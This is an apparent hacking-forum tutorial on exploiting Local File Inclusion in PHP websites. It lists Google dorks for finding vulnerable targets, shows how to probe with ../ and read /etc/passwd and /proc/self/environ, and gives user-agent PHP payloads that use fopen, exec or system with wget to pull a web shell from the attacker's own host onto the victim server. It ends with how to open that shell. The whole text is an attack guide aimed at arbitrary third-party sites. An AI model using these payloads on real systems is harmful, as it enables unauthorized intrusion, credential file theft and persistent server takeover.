Basicly LFI stands for Local File Inclusion, This attack can allow the attacker to gain access to the server by upload a shell to the website

This attack needs 3 main things to get it done
[list]
[] Shell –> You can find shells here
[
] User Agent Switcher Addon –> For Chrome or FireFox
[*] Hosted Website that allows PHP –> 000WebHost, Zymic, 110MB
[/list]

Here are some google dorks to find the vulnerability :
inurl:index.php?id= inurl:index.php?cat= inurl:index.php?action= inurl:index.php?content= inurl:index.php?page=

Now we have to create a new user agent and put in User Agent field the following code :
<?php phpinfo(); ?>
Description field is the name of the user agent so put what ever you want like this :

Image

and for other fields remove them, so now create another user agent and in User Agent field put the one following codes but i will use the first one :
<?php $file = fopen("urshellname.php","w+"); $stream = fopen ("http://ursitename.com/urshellname.txt", "r"); while(!feof($stream)) { $shell .=fgets($stream); } fwrite($file, $shell); fclose($file);?>
<?exec ('wget http://ursitename.com/urshellname.txt -O urshellname.php');?>
<?system('wget http://ursitename.com/urshellname.txt -O urshellname.php');?>
it should look like this :

Image

Remmember to change the path in the code to your site and when you upload your shell it must be in .txt not .php format so that the code can read & excute it.

To check if website is vulnerable write ../ in after the paremeter like this http://www.site.com/index.php?id=../ and if you got [function.include] then the website may be vulnerable.
So after getting the error remove ../ and replace with it /etc/passwd like http://www.site.com/index.php?id=/etc/passwd if you got another [function.include] then add ../ until you got many text ( http headers ) then the site is vulnerable so after you find the passwd file we have to replace /etc/passwd it to be /proc/self/environ
so the url will be something like this
http://www.site.com/index.php?id=/proc/self/environ

now change your user agent to the first created user agent that contain <?php phpinfo(); ?> and reload the page , if you got a text similar to PHP VERSION then the site has excuted the code.

So Uploading the shell is the easy same as the above one we have to change our user agent to the second one we created and remmember to fix the paths in your user agent and reload the page.

To access your shell go to http://www.site.com/index.php?id=urshellname.php
and if that didn’t work then try this
http://www.site.com/urshellname.php
And now you have gain access to the server and uploaded your shell successfully.